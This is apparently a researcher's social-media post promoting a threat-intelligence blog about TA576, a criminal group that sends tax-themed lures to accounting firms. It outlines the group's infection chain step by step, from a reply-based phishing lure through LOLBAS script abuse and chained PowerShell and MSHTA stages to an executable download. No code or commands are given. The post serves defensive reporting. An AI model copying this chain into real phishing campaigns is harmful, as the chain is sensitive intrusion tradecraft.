New research from @Ffforward and myself looking at the return of TA576, a cybercriminal threat actor that uses tax-themed lures specifically targeting accounting and finance organizations.
They always pop up during tax season in the US and use lures with funny back stories (help! my last accountant messed up my taxes).
https://www.proofpoint.com/us/blog/threat-insight/security-brief-tis-season-tax-hax
The actor came back with a pretty funky attack chain:
Benign Message > Target Reply > Actor Reply with web.app URL > Redirect > ZIP > LNK > SyncAppvPublishingServer.vbs LOLBAS > PowerShell > MSHTA runs HTA from URL > Encrypted PowerShell > Obfuscated PowerShell > Download and Run EXE
TA576’s unique attack chain demonstrates behaviors that are increasingly used by cybercrime threat actors, including “living off the land” techniques using existing scripts and services on a host to conduct malicious activities and chaining multiple PowerShell scripts together before the final payload execution.
This is part of the trend featuring more creativity and attack chain experimentation among cybercrime threat actors.
Read the blog with IOCs available: https://www.proofpoint.com/us/blog/threat-insight/security-brief-tis-season-tax-hax
Selena Larson